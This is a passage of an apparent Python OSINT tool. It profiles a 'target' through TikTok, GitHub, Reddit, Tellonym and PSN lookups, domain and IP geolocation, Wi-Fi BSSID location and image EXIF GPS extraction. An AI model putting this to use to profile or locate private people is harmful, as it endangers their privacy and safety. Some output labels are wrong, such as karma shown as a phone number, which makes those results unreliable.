| if "@" in self.username: self.username = self.username.replace("@", "") 447 | self.admin() 448 | 449 | def admin(self): 450 | self.send_request() 451 | self.output() 452 | 453 | def send_request(self): 454 | headers = {"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0"} 455 | r = requests.get(f"https://www.tiktok.com/@{self.username}", headers=headers) 456 | 457 | try: 458 | soup = BeautifulSoup(r.text, 'html.parser') 459 | script_tag = soup.find('script', {'id': '__UNIVERSAL_DATA_FOR_REHYDRATION__'}) 460 | script_text = script_tag.text.strip() 461 | self.json_data = json.loads(script_text)["__DEFAULT_SCOPE__"]["webapp.user-detail"]["userInfo"] 462 | except: print(f"{Red}E : Username not found!{White}") 463 | 464 | def get_user_id(self): 465 | try: return str(self.json_data["user"]["id"]) 466 | except IndexError: return "Unknown" 467 | 468 | def get_name(self): 469 | try: return self.json_data["user"]["nickname"] 470 | except IndexError: return "Unknown" 471 | 472 | def is_verified(self): 473 | try: 474 | check = self.json_data["user"]["verified"] 475 | if check == "false" or check is False: return "No" 476 | else: return "Yes" 477 | except: return "Unknown" 478 | 479 | def secUid(self): 480 | try: return self.json_data["user"]["secUid"] 481 | except: return "Unknown" 482 | 483 | def is_private(self): 484 | try: 485 | check = self.json_data["user"]["privateAccount"] 486 | if check == "true" or check is True: return "Yes" 487 | else: return "No" 488 | except: return "Unknown" 489 | 490 | def 
followers(self): 491 | try: return self.json_data["stats"]["followerCount"] 492 | except: return "Unknown" 493 | 494 | def following(self): 495 | try: return self.json_data["stats"]["followingCount"] 496 | except: return "Unknown" 497 | 498 | def user_create_time(self): 499 | try: 500 | url_id = int(self.get_user_id()) 501 | binary = "{0:b}".format(url_id) 502 | i = 0 503 | bits = "" 504 | while i < 31: 505 | bits += binary[i] 506 | i += 1 507 | timestamp = int(bits, 2) 508 | dt_object = datetime.fromtimestamp(timestamp) 509 | return dt_object 510 | except: return "Unknown" 511 | 512 | def last_change_name(self): 513 | try: 514 | time = self.json_data["user"]["nickNameModifyTime"] 515 | check = datetime.fromtimestamp(int(time)) 516 | return check 517 | except: return "Unknown" 518 | 519 | def account_region(self): 520 | try: return self.json_data["user"]["region"] 521 | except: return "Unknown" 522 | 523 | def video_count(self): 524 | try: return self.json_data["stats"]["videoCount"] 525 | except: return "Unknown" 526 | 527 | def open_favorite(self): 528 | try: 529 | check = self.json_data["user"]["openFavorite"] 530 | if check is False or check == "false": return "No" 531 | return "Yes" 532 | except: return "Unknown" 533 | 534 | def see_following(self): 535 | try: 536 | check = str(self.json_data["user"]["followingVisibility"]) 537 | if check == "1": return "Yes" 538 | return "No" 539 | except: return "Unknown" 540 | 541 | def language(self): 542 | try: return str(self.json_data["user"]["language"]) 543 | except: return "Unknown" 544 | 545 | def heart_count(self): 546 | try: return str(self.json_data["stats"]["heart"]) 547 | except: return "Unknown" 548 | 549 | def output(self): 550 | print(f"{White}[ Get info for {Blue}@{self.username} {Green}✓{White} ]\n") 551 | time.sleep(1) 552 | 553 | table = Table(title="") 554 | table.add_column("Info", no_wrap=True) 555 | table.add_column("Acc") 556 | table.add_row("ID", str(self.get_user_id())) 557 | table.add_row("SecUid", str(self.secUid())) 558 | table.add_row("is verified?", str(self.is_verified())) 559 | table.add_row("is private?", str(self.is_private())) 560 | table.add_row("Username", str("@"+self.username)) 561 | table.add_row("Nickname", str(self.get_name())) 562 | table.add_row("Location", str(self.account_region())) 563 | table.add_row("Followers", str(self.followers())) 564 | table.add_row("Following", str(self.following())) 565 | table.add_row("Can see following list?", str(self.see_following())) 566 | table.add_row("Videos", str(self.video_count())) 567 | table.add_row("Likes", str(self.heart_count())) 568 | table.add_row("Open Fav?", str(self.open_favorite())) 569 | table.add_row("Language", str(self.language())) 570 | table.add_row("Create", str(self.user_create_time())) 571 | table.add_row("Last change nickname", str(self.last_change_name())) 572 | Console().print(table, justify="left") 573 | 574 | username = input(f"{White}[{Blue}+{White}] Enter username target : {Blue}@") 575 | 576 | print(f"{White}Getting info...") 577 | time.sleep(3) 578 | Tik(username) 579 | elif user_input == "4" or user_input == "04" or user_input == "GitHub" or user_input == "GITHUB" or user_input == "github": 580 | class Github: 581 | def __init__(self): 582 | self.Start() 583 | 584 | def Start(self): 585 | self.username = input(f"{White}[{Blue}+{White}] Enter username target : {Blue}@") 586 | 587 | print(f"{White}Getting info...") 588 | time.sleep(3) 589 | print(f"{White}[ Get info for {Blue}@{self.username} {Green}✓{White} ]\n") 590 | time.sleep(1) 
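# The lookup below uses GitHub's public REST endpoint
#   GET https://api.github.com/users/<username>
# which returns the account's public profile as JSON (login, name, company, bio,
# followers, created_at, ...). Unauthenticated requests to this API are
# rate-limited, so repeated lookups may start returning an error payload instead
# of profile data.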
591 | 592 | try: 593 | self.Get = requests.get('https://api.github.com/users/%s'%(self.username)) 594 | self.Req = json.loads(self.Get.text) 595 | table = Table(title="") 596 | table.add_column("Info", no_wrap=True) 597 | table.add_column("Acc") 598 | table.add_row("ID", str(self.Req['node_id'])) 599 | table.add_row("Type", str(self.Req['type'])) 600 | table.add_row("Username", str("@"+self.Req['login'])) 601 | table.add_row("Acc link", str(self.Req['html_url'])) 602 | table.add_row("Nickname", str(self.Req['name'])) 603 | table.add_row("Company", str(self.Req['company'])) 604 | table.add_row("Bio", str(self.Req['bio'])) 605 | table.add_row("Public email", str(self.Req['email'] if self.Req['email'] else "No")) 606 | table.add_row("Bio link", str(self.Req['blog'])) 607 | table.add_row("X link", str(self.Req['twitter_username'] if self.Req['twitter_username'] else "No")) 608 | table.add_row("Avatar", str(self.Req['avatar_url'])) 609 | table.add_row("Location", str(self.Req['location'])) 610 | table.add_row("Followers", str(self.Req['followers'])) 611 | table.add_row("Following", str(self.Req['following'])) 612 | table.add_row("Public repos", str(self.Req['public_repos'])) 613 | table.add_row("Public gists", str(self.Req['public_gists'])) 614 | table.add_row("Create", str(self.Req['created_at'])) 615 | table.add_row("Hireable", str("Yes" if self.Req['hireable'] else "No")) 616 | table.add_row("Last updated", str(self.Req['updated_at'])) 617 | Console().print(table, justify="left") 618 | except BaseException as mag: print(f"{Red}E : {mag}") 619 | if __name__=='__main__': Github() 620 | elif user_input == "5" or user_input == "05" or user_input == "Reddit" or user_input == "REDDIT" or user_input == "reddit": 621 | client_id = input(f"{White}[{Blue}+{White}] - Enter your client ID : {Blue}") 622 | client_secret = input(f"{White}[{Blue}+{White}] - Enter your client secert : {Blue}") 623 | user_agent = input(f"{White}[{Blue}+{White}] - Enter your useragent : {Blue}@") 624 | username = input(f"{White}[{Blue}+{White}] - Enter username target : {Blue}@") 625 | 626 | print(f"{White}Getting info...") 627 | time.sleep(3) 628 | print(f"{White}[ Get info for {Blue}@{username} {Green}✓{White} ]\n") 629 | time.sleep(1) 630 | 631 | reddit = praw.Reddit(client_id=client_id, client_secret=client_secret, user_agent=user_agent) 632 | 633 | try: 634 | username = reddit.redditor(username) 635 | 636 | table = Table(title="") 637 | table.add_column("Info", no_wrap=True) 638 | table.add_column("Acc") 639 | table.add_row("ID", str(username.id)) 640 | table.add_row("Username", str("@"+username.name)) 641 | table.add_row("Nickname", str(username.fullname)) 642 | table.add_row("Avatar", str(username.icon_img)) 643 | table.add_row("Bio", str(username.subreddit['description'])) 644 | table.add_row("Bio link", str(username.subreddit['public_description'])) 645 | table.add_row("Public email", str("Yes" if username.has_verified_email else "No")) 646 | table.add_row("Public phonenumber", str(username.comment_karma + username.link_karma)) 647 | table.add_row("Create", str(username.created_utc)) 648 | Console().print(table, justify="left") 649 | except BaseException as mag: print(f"{Red}E : {mag}") 650 | elif user_input == "6" or user_input == "06" or user_input == "Tellonym" or user_input == "TELLONYM" or user_input == "tellonym" or user_input == "Tell" or user_input == "TELL" or user_input == "tell": 651 | class Tell: 652 | def __init__(self, username): 653 | self.username = username 654 | self.driver = self.driver() 655 | 
self.get_info() 656 | 657 | @staticmethod 658 | def driver(): 659 | chrome_options = Options() 660 | chrome_options.add_argument('disable-infobars') 661 | chrome_options.add_argument("--disable-logging") 662 | chrome_options.add_argument('--log-level=3') 663 | chrome_options.add_argument("--headless") 664 | chrome_options.add_argument("--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36") 665 | return webdriver.Chrome(options=chrome_options) 666 | 667 | def get_info(self): 668 | try: 669 | self.driver.get(f"https://api.tellonym.me/profiles/name/{self.username}?previousRouteName=ScreenProfileSharing&isClickedInSearch=true&sourceElement=Search%20Result&adExpId=91&limit=16") 670 | self.driver.implicitly_wait(5) 671 | response = self.driver.find_element(By.TAG_NAME, "pre") 672 | 673 | if "The entry you were looking for could not be found." in response.text: 674 | input(f"{Red}Username not found!{White}") 675 | exit() 676 | elif "This account is banned." in response.text: 677 | input(f"{Red}acc is banned!{White}") 678 | exit() 679 | else: 680 | json_data = json.loads(response.text) 681 | id = json_data.get("id", "Unknown") 682 | username = json_data.get("username", "Unknown") 683 | name = json_data.get("displayName", "Unknown") 684 | bio = json_data.get("aboutMe", "Unknown") 685 | avatar = f"https://userimg.tellonym.me/lg-v2/{json_data['avatarFileName']}" 686 | countryCode = json_data.get("countryCode", "Unknown") 687 | followers = json_data.get("followerCount", "Unknown") 688 | anonymousFollowerCount = json_data.get("anonymousFollowerCount", "Unknown") 689 | RealFollowers = followers - anonymousFollowerCount or "0" 690 | following = json_data.get("followingCount", "Unknown") 691 | tell = json_data.get("tellCount", "Unknown") 692 | answer = json_data.get("answerCount", "Unknown") 693 | likes = json_data.get("likesCount", "Unknown") 694 | is_Verified = json_data.get("isVerified", "Unknown") 695 | is_Able_to_comment = json_data.get("isAbleToComment", "Unknown") 696 | is_Active = json_data.get("isActive", "Unknown") 697 | 698 | table = Table(title="\n") 699 | table.add_column("Info", no_wrap=True) 700 | table.add_column("Acc") 701 | table.add_row("ID", str(id)) 702 | table.add_row("Username", str("@"+username)) 703 | table.add_row("Name", str(name)) 704 | table.add_row("Bio", str(bio)) 705 | table.add_row("Avatar", str(avatar)) 706 | table.add_row("Country", str(countryCode)) 707 | table.add_row("Followers", str(followers)) 708 | table.add_row("Real Followers", str(RealFollowers)) 709 | table.add_row("Anonymous Followers", str(anonymousFollowerCount)) 710 | table.add_row("Following", str(following)) 711 | table.add_row("Tells", str(tell)) 712 | table.add_row("Answers", str(answer)) 713 | table.add_row("Likes", str(likes)) 714 | table.add_row("is Verified acc?", "Yes" if is_Verified else "No") 715 | table.add_row("is Able to comment?", "Yes" if is_Able_to_comment else "No") 716 | table.add_row("is Active now?", "Yes" if is_Active else "No") 717 | Console().print(table, justify="left") 718 | except BaseException as mag: print(f"{Red}E : {mag}") 719 | 720 | username = input(f"{White}[{Blue}+{White}] - Enter username target : {Blue}@") 721 | print(f"{White}Getting info...") 722 | time.sleep(3) 723 | print(f"{White}[ Get info for {Blue}@{username} {Green}✓{White} ]\n") 724 | time.sleep(1) 725 | Tell(username) 726 | elif user_input == "7" or user_input == "07" or user_input == "Sony" or user_input == "SONY" or user_input == "sony": 
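# Sony/PSN lookups go through the psnawp_api package. The npsso value requested
# below is the session token copied after signing in on Sony's site (see the
# README's ssocookie link); check_from_code(), called in admin() and expected to
# be defined later in this class, presumably validates it and stores an
# authenticated client in self.r, roughly:
#   psnawp = PSNAWP(npsso)   # sketch only -- assumes psnawp_api's documented constructor
#   me = psnawp.me()         # the token owner's own account, as used by my_acc_info()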
727 | class PSN(): 728 | def __init__(self): 729 | self.key = input(f"{White}[{Blue}+{White}] Enter the npsso : {Blue}") 730 | self.r = None 731 | self.admin() 732 | 733 | def admin(self): 734 | print(f"{White}Check npsso...\n") 735 | time.sleep(1.5) 736 | 737 | self.check_from_code() 738 | 739 | if self.r: 740 | submenu5() 741 | user_input_submenu5 = input(f"Choose : {Blue}") 742 | if user_input_submenu5 == "1" or user_input_submenu5 == "01" or user_input_submenu5 == "My acc info" or user_input_submenu5 == "MY ACC INFO" or user_input_submenu5 == "my acc info": self.my_acc_info() 743 | elif user_input_submenu5 == "2" or user_input_submenu5 == "02" or user_input_submenu5 == "Osint for user by username" or user_input_submenu5 == "OSINT FOR USER BY USERNAME" or user_input_submenu5 == "osint for user by username": self.osint_username() 744 | elif user_input_submenu5 == "3" or user_input_submenu5 == "03" or user_input_submenu5 == "Osint for user by userID" or user_input_submenu5 == "OSINT FOR USER BY USERID" or user_input_submenu5 == "osint for user by userid": self.osint_userid() 745 | elif user_input_submenu5 == "99" or user_input_submenu5 == "Back" or user_input_submenu5 == "BACK" or user_input_submenu5 == "back": main_menu() 746 | else: 747 | print(f"{Red}Please choose a correct option!") 748 | submenu5() 749 | else: print(f"{Red}Please enter a correct npsso!") 750 | 751 | def my_acc_info(self): 752 | print(f"{White}Getting info...") 753 | time.sleep(3) 754 | print(f"{White}[ Get info for {Blue}{self.key} {Green}✓{White} ]") 755 | time.sleep(1) 756 | 757 | info = self.r.me() 758 | table = Table(title="\n") 759 | table.add_column("Info", no_wrap=True) 760 | table.add_column("Acc") 761 | table.add_row("UserID", info.account_id) 762 | table.add_row("Username", f"@{info.online_id}") 763 | info_profile = json.dumps(info.get_profile_legacy()) 764 | info_profile = json.loads(info_profile) 765 | table.add_row("Nickname", f"{info_profile['profile']['personalDetail']['firstName']} {info_profile['profile']['personalDetail']['lastName']}") 766 | device_info = json.dumps(info.get_account_devices()) 767 | device_info = json.loads(device_info) 768 | table.add_row("Device", "PlayStation") 769 | i = 0 770 | while True: 771 | try: 772 | table.add_row("Device ID", device_info[i]['deviceId']) 773 | table.add_row("Device Type", device_info[i]['deviceType'] if device_info[i]['deviceType'] else "Not Found") 774 | table.add_row("Activation Date", device_info[i]['activationDate']) 775 | i += 1 776 | except: break 777 | table.add_row("Avatar", info_profile['profile']['avatarUrls'][0]['avatarUrl'] if info_profile['profile']['avatarUrls'][0]['avatarUrl'] else "Not Found") 778 | table.add_row("Have Plus?", str(info_profile['profile']['plus'])) 779 | table.add_row("Trophies", f"{info_profile['profile']['trophySummary']['earnedTrophies']['bronze']} Bronze | {info_profile['profile']['trophySummary']['earnedTrophies']['silver']} Silver | {info_profile['profile']['trophySummary']['earnedTrophies']['gold']} Gold | {info_profile['profile']['trophySummary']['earnedTrophies']['platinum']} Platinum") 780 | Console().print(table, justify="left") 781 | friends_list = info.friends_list() 782 | print("Friends List") 783 | for accounts in friends_list: 784 | print(f" User : @{accounts.online_id}") 785 | info_b = info.blocked_list() 786 | print("Blocked List") 787 | for users in info_b: 788 | print(f" User : @{users.online_id}") 789 | 790 | def osint_username(self): 791 | username = input(f"{White}[{Blue}+{White}] Enter username target : 
{Blue}@") 792 | 793 | print(f"{White}Getting info...") 794 | time.sleep(3) 795 | print(f"{White}[ Get info for {Blue}{username} {Green}✓{White} ]") 796 | time.sleep(1) 797 | 798 | try: 799 | info = self.r.user(online_id=username) 800 | table = Table(title="\n") 801 | table.add_column("Info", no_wrap=True) 802 | table.add_column("Acc") 803 | profile_info = info.profile() 804 | table.add_row("UserID", info.account_id) 805 | table.add_row("Username", f"@{profile_info['onlineId']}") 806 | table.add_row("Nickname", f"{profile_info['personalDetail']['firstName']} {profile_info['personalDetail']['lastName']}") 807 | table.add_row("Avatar", profile_info['personalDetail']['profilePictures'][0]['url']) 808 | table.add_row("Bio", profile_info['personalDetail']['profilePictures'][0]['url']) 809 | table.add_row("Have Plas?", str(profile_info['isPlus'])) 810 | Console().print(table, justify="left") 811 | except BaseException as mag: print(f"{Red}E : {mag}") 812 | 813 | def osint_userid(self): 814 | userid = input(f"{White}[{Blue}+{White}] Enter userid target : {Blue}") 815 | 816 | print(f"{White}Getting info...") 817 | time.sleep(3) 818 | print(f"{White}[ Get info for {Blue}{userid} {Green}✓{White} ]") 819 | time.sleep(1) 820 | 821 | try: 822 | info = self.r.user(account_id=userid) 823 | table = Table(title="\n") 824 | table.add_column("Info", no_wrap=True) 825 | table.add_column("Acc") 826 | profile_info = info.profile() 827 | table.add_row("UserID", info.account_id) 828 | table.add_row("Username", f"@{profile_info['onlineId']}") 829 | table.add_row("Nickname", f"{profile_info['personalDetail']['firstName']} {profile_info['personalDetail']['lastName']}") 830 | table.add_row("Avatar", profile_info['personalDetail']['profilePictures'][0]['url']) 831 | table.add_row("Bio", profile_info['personalDetail']['profilePictures'][0]['url']) 832 | table.add_row("Have Plas?", str(profile_info['isPlus'])) 833 | Console().print(table, justify="left") 834 | except BaseException as mag: print(f"{Red}E : {mag}") 835 | 836 | def setup(self): 837 | self.r = PSNAWP(self.key) 838 | 839 | def check_from_code(self): 840 | try: 841 | check = PSNAWP(self.key) 842 | self.setup() 843 | except: print(f"{Red}E : The npsso not working!") 844 | PSN() 845 | elif user_input == "99" or user_input == "Back" or user_input == "BACK": main_menu() 846 | else: print(f"{Red}Please choose a correct option!") 847 | elif selection == "4" or selection == "04" or selection == "Domains OSINT" or selection == "DOMAINS OSINT" or selection == "domains osint": 848 | domain = input(f"{White}[{Blue}+{White}] - Enter the domain or IP : {Blue}") 849 | 850 | print(f"{White}Getting info...") 851 | time.sleep(3) 852 | print(f"[ Get info for {Blue}{domain} {Green}✓{White} ]\n") 853 | time.sleep(1) 854 | 855 | def domain_info(): 856 | url = f"https://demo.ip-api.com/json/{domain}?fields=66842623&lang=en" 857 | headers = { 'Accept': '*/*', 858 | 'Accept-Encoding': 'gzip, deflate, br', 859 | 'Accept-Language': 'en-US,en;q=0.9', 860 | 'Connection': 'keep-alive', 861 | 'Host': 'demo.ip-api.com', 862 | 'Origin': 'https://ip-api.com', 863 | 'Referer': 'https://ip-api.com/', 864 | 'sec-ch-ua': '".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103"', 865 | 'sec-ch-ua-mobile': '?0', 866 | 'sec-ch-ua-platform': "Windows", 867 | 'Sec-Fetch-Dest': 'empty', 868 | 'Sec-Fetch-Mode': 'cors', 869 | 'Sec-Fetch-Site': 'same-site', 870 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36' } 871 
| req1 = requests.post(url, headers=headers) 872 | req2 = requests.get(f'https://ipapi.co/{domain}/json/') 873 | 874 | table = Table(title="") 875 | table.add_column("Info", no_wrap=True) 876 | table.add_column("Domain") 877 | try: 878 | response = requests.get(f"https://{domain}/") 879 | table.add_row("URL", str(response.url)) 880 | except requests.exceptions.SSLError: table.add_row("URL", str(socket.gethostbyaddr(domain))) 881 | try: 882 | ip = socket.gethostbyname(domain) 883 | table.add_row("IP", str(ip)) 884 | hexhost = socket.inet_aton(domain) 885 | table.add_row("Binary Host", str(hexhost)) 886 | table.add_row("Hex Host", str(hexlify(hexhost))) 887 | except OSError: 888 | hexhost = socket.inet_aton(ip) 889 | table.add_row("Binary Host", str(hexhost)) 890 | table.add_row("Hex Host", str(hexlify(hexhost))) 891 | try: table.add_row("Version", str(req2.json()['version'])) 892 | except KeyError: None 893 | table.add_row("ISP", str(req1.json()['isp'])) 894 | table.add_row("FQDN", str(socket.getfqdn(domain))) 895 | try: table.add_row("Asn", str(req2.json()['asn'])) 896 | except KeyError: None 897 | table.add_row("Status", str(req1.json()['status'])) 898 | table.add_row("Continent", str(req1.json()['continent'])) 899 | table.add_row("ContinentCode", str(req1.json()['continentCode'])) 900 | table.add_row("Country", str(req1.json()['country'])) 901 | table.add_row("CountryCode", str(req1.json()['countryCode'])) 902 | table.add_row("Region", str(req1.json()['region'])) 903 | table.add_row("RegionName", str(req1.json()['regionName'])) 904 | table.add_row("City", str(req1.json()['city'])) 905 | table.add_row("District", str(req1.json()['district'])) 906 | table.add_row("Zip", str(req1.json()['zip'])) 907 | table.add_row("TimeZone", str(req1.json()['timezone'])) 908 | table.add_row("Currency", str(req1.json()['currency'])) 909 | table.add_row("Lat", str(req1.json()['lat'])) 910 | table.add_row("Lon", str(req1.json()['lon'])) 911 | table.add_row("Offset", str(req1.json()['offset'])) 912 | table.add_row("Mobile", str("Yes" if req1.json()['mobile'] is True else "No")) 913 | table.add_row("Proxy", str("Yes" if req1.json()['proxy'] is True else "No")) 914 | table.add_row("Hosting", str("Yes" if req1.json()['hosting'] is True else "No")) 915 | Console().print(table, justify="left") 916 | domain_info() 917 | elif selection == "5" or selection == "05" or selection == "IP's OSINT" or selection == "IP'S OSINT" or selection == "ip's osint": 918 | ip_osint_selections = input(f"""{White}[{Blue}01{White}] - Target 919 | [{Blue}02{White}] - Your device 920 | 921 | [{Blue}99{White}] - Back 922 | Choose : {Blue}""") 923 | if ip_osint_selections == "1" or ip_osint_selections == "01" or ip_osint_selections == "Target" or ip_osint_selections == "TARGET" or ip_osint_selections == "target": 924 | target_ip = input(f"{White}[{Blue}+{White}] - Enter Target IP : {Blue}") 925 | 926 | print(f"{White}Getting info...") 927 | time.sleep(3) 928 | print(f"[ Get info for {Blue}{target_ip} {Green}✓{White} ]\n") 929 | time.sleep(1) 930 | 931 | try: 932 | response = requests.get(url=f'http://ip-api.com/json/{target_ip}').json() 933 | 934 | table = Table(title="") 935 | table.add_column("Info", no_wrap=True) 936 | table.add_column("IP") 937 | table.add_row("IP", str(response.get('query'))) # ip-api.com returns the looked-up address under the 'query' key 938 | ip_version = ipaddress.ip_address(target_ip) 939 | table.add_row("Version", str("IPV4" if ip_version.version == 4 else "IPV6")) 940 | hexhost = socket.inet_aton(target_ip) 941 | table.add_row("Binary Host", str(hexhost)) 942 | 
table.add_row("Hex Host", str(hexlify(hexhost))) 943 | ip_hostname = socket.gethostname() 944 | table.add_row("ISP", str(response.get('isp'))) 945 | table.add_row("Country", str(response.get('country'))) 946 | table.add_row("RegionName", str(response.get('regionName'))) 947 | table.add_row("City", str(response.get('city'))) 948 | table.add_row("Zip", str(response.get('zip'))) 949 | table.add_row("Lat", str(response.get('lat'))) 950 | table.add_row("Lon", str(response.get('lon'))) 951 | Console().print(table, justify="left") 952 | except requests.exceptions.ConnectionError: print(f"{Red}Please check your connection!") 953 | elif ip_osint_selections == "2" or ip_osint_selections == "02" or ip_osint_selections == "Your device" or ip_osint_selections == "YOUR DEVICE" or ip_osint_selections == "your device": 954 | device_host_name = socket.gethostname() 955 | device_ip = socket.gethostbyname(device_host_name) 956 | ip_version = ipaddress.ip_address(device_ip) 957 | 958 | table = Table(title=f"{White}") 959 | table.add_column("Info", no_wrap=True) 960 | table.add_column("Yor device") 961 | table.add_row("OS", str(platform.system())) 962 | table.add_row("OS release", str(platform.version())) 963 | table.add_row("Architecture", str(platform.architecture())) 964 | table.add_row("Processor", str(platform.processor())) 965 | table.add_row("Total, Physical cores", str(f"{psutil.cpu_count(logical=True)}, {psutil.cpu_count(logical=False)}")) 966 | cpufreq = psutil.cpu_freq() 967 | table.add_row("Max, Min, Current frequency", str(f"{cpufreq.max:.2f} MHz, {cpufreq.min:.2f} MHz, {cpufreq.current:.2f} MHz")) 968 | for i, percentage in enumerate(psutil.cpu_percent(percpu=True, interval=1)): table.add_row(f"Core {i}", str(f"{percentage}%")) 969 | table.add_row(f"Total CPU Usage", str(f"{psutil.cpu_percent()}%")) 970 | total, used, free = shutil.disk_usage("/") 971 | table.add_row("Total, Used, Free storage space", str(f"{total//(2**30)}GB, {used//(2**30)}GB, {free//(2**30)}GB")) 972 | table.add_row("Hostname", str(device_host_name)) 973 | table.add_row("IP", str(device_ip)) 974 | table.add_row("Version", str("IPV4" if ip_version.version == 4 else "IPV6")) 975 | hexhost = socket.inet_aton(device_ip) 976 | table.add_row("Binary Host", str(hexhost)) 977 | table.add_row("Hex Host", str(hexlify(hexhost))) 978 | try: ipv6_addr = str(socket.getaddrinfo(device_host_name, None, socket.AF_INET6)[0][4][0]) 979 | except socket.gaierror: ipv6_addr = "Unavailable" 980 | table.add_row("IPV6", ipv6_addr) 981 | Console().print(table, justify="left") 982 | elif ip_osint_selections == "99" or ip_osint_selections == "Back" or ip_osint_selections == "BACK" or ip_osint_selections == "back": main_menu() 983 | else: print(f"{Red}Please choose a correct option!") 984 | elif selection == "6" or selection == "06" or selection == "Networks OSINT" or selection == "NETWORKS OSINT" or selection == "networks osint": 985 | submenu3() 986 | user_input = input(f"Choose : {Blue}") 987 | 988 | if user_input == "1" or user_input == "01" or user_input == "Networks OSINT" or user_input == "NETWORKS OSINT" or user_input == "networks osint": 989 | print(f"{White}Getting info...") 990 | time.sleep(3) 991 | print(f"[ Get info for {Blue}networks {Green}✓{White} ]") 992 | time.sleep(1) 993 | 994 | def check_os(): 995 | os_name = platform.system() 996 | 997 | if os_name == "Windows": 998 | print(f"{Blue}") 999 | os.system("netsh wlan show interfaces & netsh wlan show networks & ipconfig") 1000 | print(f"{White}") 1001 | elif os_name == "Linux": 1002 | def 
get_distro_name(): 1003 | try: 1004 | output = subprocess.check_output("lsb_release -i", shell=True) 1005 | distro_name = output.decode().split(":")[1].strip().lower() 1006 | except BaseException as e: distro_name = None 1007 | return distro_name 1008 | distro_name = get_distro_name() 1009 | if "kali" in distro_name or "Mac OS" in os.environ: 1010 | print(f"{Blue}") 1011 | os.system("ifconfig") 1012 | print(f"{White}") 1013 | elif "parrot" in distro_name: 1014 | print(f"{Blue}") 1015 | os.system("ip address") 1016 | print(f"{White}") 1017 | elif "arch" in distro_name or "backbox" in distro_name: 1018 | print(f"{Blue}") 1019 | os.system("ip") 1020 | print(f"{White}") 1021 | elif os_name == "Darwin": 1022 | if "iSH" in os.environ or "termux" in os.environ: 1023 | print(f"{Blue}") 1024 | os.system("ip a") 1025 | print(f"{White}") 1026 | else: pass 1027 | else: print(f"{Red}OSINT cannot be done because your operating system is unknown!{White}") 1028 | print(check_os()) 1029 | elif user_input == "2" or user_input == "02" or user_input == "Show network operations" or user_input == "SHOW NETWORK OPERATIONS" or user_input == "show network operations": 1030 | print(f"{White}Extracting network operations...") 1031 | time.sleep(3) 1032 | print(f"\n[ Get {Blue}network operations {Green}✓{White} ]") 1033 | time.sleep(1) 1034 | 1035 | print(f"{Blue}") 1036 | os.system("netstat") 1037 | print(f"{White}") 1038 | elif user_input == "3" or user_input == "03" or user_input == "Extract The Location" or user_input == "EXTRACT THE LOCATION" or user_input == "extract The Location": 1039 | ___author___ = 'D4rkC00d3r' 1040 | 1041 | bssid = input(f"{White}[{Blue}+{White}] Enter the bssid target (ex: 00:0C:42:1F:65:E9) : {Blue}") 1042 | 1043 | api_uri = "https://api.mylnikov.org/geolocation/wifi?v=1.1&data=open&bssid=" 1044 | map_url = "http://find-wifi.mylnikov.org/#" 1045 | 1046 | def show_map(): 1047 | while True: 1048 | show_map = input(f"Show the map? 
({Blue}Y{White}/{Blue}N{White}) {Blue}") 1049 | if show_map == "Y" or show_map == "y" or show_map == "Yes" or show_map == "yes": 1050 | webbrowser.open(map_url+bssid) 1051 | return 1052 | else: break 1053 | 1054 | data = requests.get(api_uri + bssid).json() # the mylnikov API answers with 'desc' on failure and lat/lon/range under 'data' on success 1055 | if 'desc' in data: print(data['desc']) 1056 | else: 1057 | table = Table(title="") 1058 | table.add_column("Info", no_wrap=True) 1059 | table.add_column("Network") 1060 | table.add_row("Lat", str(data['data']['lat'])) 1061 | table.add_row("Lon", str(data['data']['lon'])) 1062 | table.add_row("Meter accuracy", str(data['data']['range'])) 1063 | Console().print(table, justify="left") 1064 | show_map() 1065 | elif user_input == "99" or user_input == "Back" or user_input == "BACK" or user_input == "back": main_menu() 1066 | else: print(f"{Red}Please choose a correct option!") 1067 | elif selection == "7" or selection == "07" or selection == "Images OSINT" or selection == "IMAGES OSINT" or selection == "images osint": 1068 | class images: 1069 | def __init__(self): 1070 | try: 1071 | self.img_name = str(input(f"{White}[{Blue}+{White}] Enter the img name or path : {Blue}")).replace(" ", "") 1072 | self.image = Image.open(self.img_name) 1073 | self.img_read = cv2.imread(self.img_name) 1074 | except BaseException as msg: print(f"{Red}E: {msg}") 1075 | 1076 | def handle_exif_data(self): 1077 | exif_data = self.image._getexif() 1078 | if exif_data is not None: 1079 | for tag, value in exif_data.items(): 1080 | tag_name = TAGS.get(tag, tag) 1081 | if tag_name == "DateTimeOriginal": 1082 | return value 1083 | return None 1084 | 1085 | def DeviceInfo(self): 1086 | try: exif = self.image._getexif() 1087 | except: exit() 1088 | if self.image._getexif() is None: exit() 1089 | else: 1090 | for k, v in self.image._getexif().items(): 1091 | decoded = TAGS.get(k, k) 1092 | if decoded == "MakerNote": pass 1093 | elif decoded == "GPSInfo": self.GPSInfo = v 1094 | def _convert_to_degress(self, value): return float(value[0]) + float(value[1]) / 60.0 + float(value[2]) / 3600.0 # DMS-to-decimal-degrees helper used by GetGeoposition below 1095 | def GetGeoposition(self): 1096 | self.DeviceInfo() 1097 | gp = self.GPSInfo 1098 | if self.GPSInfo is None: 1099 | return None, None 1100 | 1101 | gpsinfo = {} 1102 | for k in gp.keys(): 1103 | decoded = GPSTAGS.get(k, k) 1104 | gpsinfo[decoded] = gp[k] 1105 | lat = None 1106 | lon = None 1107 | gps_latitude = gpsinfo.get("GPSLatitude") 1108 | gps_latitude_ref = gpsinfo.get("GPSLatitudeRef") 1109 | gps_longitude = gpsinfo.get("GPSLongitude") 1110 | gps_longitude_ref = gpsinfo.get("GPSLongitudeRef") 1111 | if gps_latitude and gps_latitude_ref and gps_longitude and gps_longitude_ref: 1112 | lat = self._convert_to_degress(gps_latitude) 1113 | if gps_latitude_ref != 'N': lat = 0 - lat 1114 | lon = self._convert_to_degress(gps_longitude) 1115 | if gps_longitude_ref != 'E': lon = 0 - lon 1116 | self.lat = lat 1117 | self.lon = lon 1118 | return True 1119 | 1120 | def LocationInfo(self): 1121 | if not self.GetGeoposition(): pass 1122 | else: 1123 | headers = { 'User-Agent':'Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) 